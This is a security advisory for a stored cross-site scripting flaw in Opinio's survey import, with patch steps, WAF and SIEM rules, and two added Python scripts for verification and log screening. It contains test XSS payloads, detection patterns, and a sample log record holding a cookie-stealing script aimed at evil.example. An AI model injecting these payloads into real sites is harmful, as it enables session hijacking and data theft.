CVE-2025-13873
📋 TL;DR
This stored cross-site scripting (XSS) vulnerability in ObjectPlanet Opinio's survey-import feature lets anyone who can import a survey embed JavaScript in it; because the payload is stored with the survey, it runs in the browser of every user who later views that survey. The affected version named in the advisory is Opinio 7.26 rev12562. Successful exploitation can compromise the sessions and data of the viewing users, including administrators.
💻 Affected Systems
- ObjectPlanet Opinio
📦 What is this software?
Opinio by ObjectPlanet is a web-based survey platform. The vulnerable code path is its survey-import feature, which ingests survey content that Opinio later renders to the users who view the survey.
⚠️ Risk & Real-World Impact
Worst Case
Attackers could steal session cookies, redirect users to malicious sites, perform actions as authenticated users, or install malware through drive-by downloads.
Likely Case
Session hijacking, credential theft, defacement of survey pages, and data exfiltration from users accessing compromised surveys.
If Mitigated
Limited impact once the vendor fix is applied, or once the import feature is restricted to trusted users and imported content is output-encoded before rendering; the temporary workarounds below may disrupt legitimate survey imports until the patch is in place.
🎯 Exploit Status
Requires the ability to use the survey-import feature (typically an authenticated account with survey-authoring rights; check which roles your deployment grants import to). Once an attacker has that, exploitation is straightforward, and since the payload is stored it fires for every user who subsequently views the imported survey.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: Check vendor changelog for specific fixed version
Vendor Advisory: https://www.objectplanet.com/opinio/changelog.html
Restart Required: Yes
Instructions:
1. Check the current Opinio version (admin interface or application configuration files) against 7.26 rev12562 and the vendor changelog.
2. Download the latest version from ObjectPlanet.
3. Back up the current installation (application files and data) before applying the update.
4. Apply the update following the vendor's instructions.
5. Restart the web application service, then re-run the XSS test in "How to Verify" to confirm the fix.
🔧 Temporary Workarounds
Disable survey-import feature
Temporarily disable, or restrict to a small set of trusted administrators, the vulnerable survey-import functionality. The payload is stored, so whoever can import can attack every later viewer of that survey.
# Configure the web server or reverse proxy to block access to the import endpoints (e.g. return 403 for the import URL)
# Or modify application permissions so that only trusted roles can use the import feature
Implement WAF rules
Add web application firewall rules to detect and block XSS payloads in survey imports. A single literal '<script' pattern misses event-handler attributes (onerror=), javascript: URIs and constructs such as <svg onload>, and is defeated by URL- or entity-encoding unless the WAF decodes first; prefer the OWASP Core Rule Set XSS rules, scoped to the import endpoint, over a hand-written rule.
# Example ModSecurity rule (illustrative, not vendor-supplied): decode URL and HTML-entity encoding before matching, match case-insensitively, log and block
SecRule ARGS "@rx (?i)<\s*script" "id:1001,phase:2,t:urlDecodeUni,t:htmlEntityDecode,deny,status:403,log,msg:'XSS indicator in survey import'"
🧯 If You Can't Patch
- Screen all survey import data before it is accepted: reject or escape markup in imported fields, and treat every imported value as untrusted when it is rendered (HTML-encode it in the output context)
- Enable Content Security Policy (CSP) headers that disallow inline script (no 'unsafe-inline'; use nonces or hashes). Test with Content-Security-Policy-Report-Only first, because a strict policy will also break any inline scripts the application itself relies on
🔍 How to Verify
Check if Vulnerable:
On a non-production instance, import a survey containing a payload with a unique marker, e.g. <script>alert('CVE-2025-13873-test')</script>, then view the imported survey in a browser. The finding is confirmed only if the script executes (the alert appears); the string merely being visible in the page source is not enough, since an entity-encoded payload is inert.
Check Version:
# Check the Opinio version in the admin interface or the application configuration files and compare it with 7.26 rev12562 and the vendor changelog
Verify Fix Applied:
After patching, repeat the XSS test: the payload must not execute and should appear entity-encoded (&lt;script&gt;...) in the rendered page. Also review surveys imported while the system was vulnerable: a fix that encodes on output neutralises stored payloads, but one that only validates on import does not, so such surveys must be re-imported or deleted.
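The check below is an added example for the verification steps above; it is not code from this page or from ObjectPlanet. It tells apart a test marker that came back entity-encoded (inert text) from one that landed where a browser would execute it: inside a script element, in an on* event-handler attribute, or in a javascript: URL. The marker string and the sample pages are constructed stand-ins for the rendered survey page.

```python
"""Classify how an XSS test marker appears in a rendered page (added example)."""
from html.parser import HTMLParser

MARKER = "cve13873probe"  # hypothetical unique token placed in the test payload


class _MarkerProbe(HTMLParser):
    """Record every place the marker occurs and whether that place is live."""

    def __init__(self, marker: str):
        # convert_charrefs=True: '&lt;script&gt;' arrives as ordinary text data,
        # which is exactly how a browser treats it (no element is created).
        super().__init__(convert_charrefs=True)
        self.marker = marker
        self.in_script = False
        self.live: list[str] = []    # positions where the marker would execute
        self.inert: list[str] = []   # positions where it is just rendered text

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.in_script = True
        for name, value in attrs:
            if not value or self.marker not in value:
                continue
            is_handler = name.lower().startswith("on")
            is_js_url = value.lstrip().lower().startswith("javascript:")
            (self.live if is_handler or is_js_url else self.inert).append(
                f"<{tag} {name}=...>")

    def handle_endtag(self, tag):
        if tag == "script":
            self.in_script = False

    def handle_data(self, data):
        # Inside a <script> element the parser is in CDATA mode and hands us
        # the raw script body; anywhere else this is plain text content.
        if self.marker not in data:
            return
        if self.in_script:
            self.live.append("<script> body")
        else:
            self.inert.append("text node")


def classify(page_html: str, marker: str = MARKER) -> str:
    """Return 'executes', 'encoded' or 'absent' for the marker in page_html."""
    probe = _MarkerProbe(marker)
    probe.feed(page_html)
    probe.close()
    if probe.live:
        return "executes"
    return "encoded" if probe.inert else "absent"


# Constructed responses standing in for the rendered survey page.
VULNERABLE_PAGE = (
    "<html><body><h1>Imported survey</h1>"
    "<p class='question'><script>alert('" + MARKER + "')</script></p>"
    "</body></html>"
)
VULNERABLE_ATTR_PAGE = (
    "<html><body><img src=x onerror=\"alert('" + MARKER + "')\"></body></html>"
)
FIXED_PAGE = (
    "<html><body><h1>Imported survey</h1>"
    "<p class='question'>&lt;script&gt;alert('" + MARKER + "')&lt;/script&gt;</p>"
    "</body></html>"
)

if __name__ == "__main__":
    for name, page in [("vulnerable", VULNERABLE_PAGE),
                       ("vulnerable-attr", VULNERABLE_ATTR_PAGE),
                       ("fixed", FIXED_PAGE)]:
        print(f"{name}: {classify(page)}")
```

This is a static check on the HTTP response, not a browser: it catches the common mistake of treating a marker that is visible in the page source as proof of execution, and it flags the attribute and URL contexts that an alert-only test can overlook. Confirm any "executes" result in a real browser, and remember that it does not model every context (for example a marker that breaks out of a string literal inside an existing inline script).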
📡 Detection & Monitoring
Log Indicators:
- Unusual survey import activity
- HTTP requests to the import endpoint whose POST data contains script tags, on* event-handler attributes or javascript: URIs, in raw or URL-encoded (%3Cscript) form
- Multiple failed import attempts
Network Indicators:
- POST requests to survey import endpoints with suspicious payloads
- Browsers of users who have just viewed a survey opening connections to unknown domains (cookie or data exfiltration callbacks)
SIEM Query:
source="web_server" AND method="POST" AND uri="*import*" AND (content="*<script*" OR content="*%3Cscript*" OR content="*javascript:*" OR content="*onerror=*" OR content="*onload=*")
The endpoint path is illustrative; substitute Opinio's actual import URL. The method and URI conditions must be combined with AND (an OR would match every POST on the server), and the body should either be matched in its URL-encoded form as well or normalised before matching, because raw POST bodies are usually encoded.
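The script below is an added example, not part of this page or of Opinio. It does the normalisation the SIEM query above needs (URL-decoding, including doubled encoding, and HTML-entity decoding) and then matches the XSS indicators listed under Log Indicators; the same normalize() and find_indicators() pair can serve as the pre-import screening gate described under Temporary Workarounds and If You Can't Patch, and here it is run over request logs. The JSON-lines log format, its field names (client, method, uri, status, body) and the /survey/import path are assumptions; Opinio's real endpoint and your proxy's log format will differ.

```python
"""Screen survey-import requests for XSS indicators (added example)."""
import html
import json
import re
from collections import Counter
from urllib.parse import unquote_plus

# The two patterns the page's SIEM query uses, plus the forms it misses.
INDICATORS = {
    "script_tag":     re.compile(r"<\s*script\b", re.I),
    "javascript_uri": re.compile(r"javascript\s*:", re.I),
    "event_handler":  re.compile(r"\bon[a-z]+\s*=", re.I),
    "active_element": re.compile(r"<\s*(svg|iframe|object|embed)\b", re.I),
}


def normalize(text: str) -> str:
    """Undo the encodings used to slip past a literal '<script' match:
    URL-encoding (possibly applied twice), HTML entities and NUL padding.
    Decoding is bounded and stops as soon as a pass changes nothing."""
    prev = None
    for _ in range(3):
        if text == prev:
            break
        prev = text
        text = html.unescape(unquote_plus(text))
    return text.replace("\x00", "")


def find_indicators(text: str) -> list[str]:
    """Names of the indicator patterns present in the normalised text."""
    norm = normalize(text)
    return [name for name, rx in INDICATORS.items() if rx.search(norm)]


def is_import_request(rec: dict) -> bool:
    # Scope to POSTs to the import endpoint (hypothetical path); the page's
    # original 'uri=... OR method=POST' would match every POST on the server.
    return rec.get("method") == "POST" and "import" in rec.get("uri", "").lower()


def scan_log(lines):
    """Return (hits, failures): hits is a list of (record, indicators) for
    import requests carrying XSS indicators; failures counts HTTP 4xx import
    attempts per client, the 'multiple failed import attempts' signal."""
    hits, failures = [], Counter()
    for line in lines:
        rec = json.loads(line)
        if not is_import_request(rec):
            continue
        if 400 <= rec.get("status", 0) < 500:
            failures[rec["client"]] += 1
        found = find_indicators(rec.get("body", ""))
        if found:
            hits.append((rec, found))
    return hits, failures


# Constructed sample records (JSON lines), not real Opinio or proxy logs.
SAMPLE_LOG = [
    '{"client":"10.0.0.5","method":"POST","uri":"/survey/import","status":200,'
    '"body":"title=Q1+Feedback&q1=How+was+it%3F"}',
    '{"client":"203.0.113.9","method":"POST","uri":"/survey/import","status":200,'
    '"body":"title=%3Cscript%3Edocument.location%3D%27http%3A%2F%2Fevil.example%2F%3F%27%2Bdocument.cookie%3C%2Fscript%3E"}',
    '{"client":"203.0.113.9","method":"POST","uri":"/survey/import","status":400,'
    '"body":"title=%253Cimg%2520src%253Dx%2520onerror%253Dalert(1)%253E"}',
    '{"client":"203.0.113.9","method":"POST","uri":"/survey/import","status":400,'
    '"body":"title=&lt;svg onload=alert(1)&gt;"}',
    '{"client":"10.0.0.7","method":"POST","uri":"/login","status":200,'
    '"body":"user=bob&pass=%3Cscript%3E"}',
]

if __name__ == "__main__":
    hits, failures = scan_log(SAMPLE_LOG)
    for rec, found in hits:
        print(rec["client"], rec["uri"], found)
    print("failed imports per client:", dict(failures))
```

Of the five constructed records, the three from 203.0.113.9 are flagged: a plain URL-encoded script tag, a double-encoded image tag with an onerror handler, and an entity-encoded svg onload payload; the /login request is outside the import scope even though it contains "<script". The event_handler pattern will also hit legitimate parameter names that start with "on" followed by "=", so tune it to the import parameters you actually see before alerting on it.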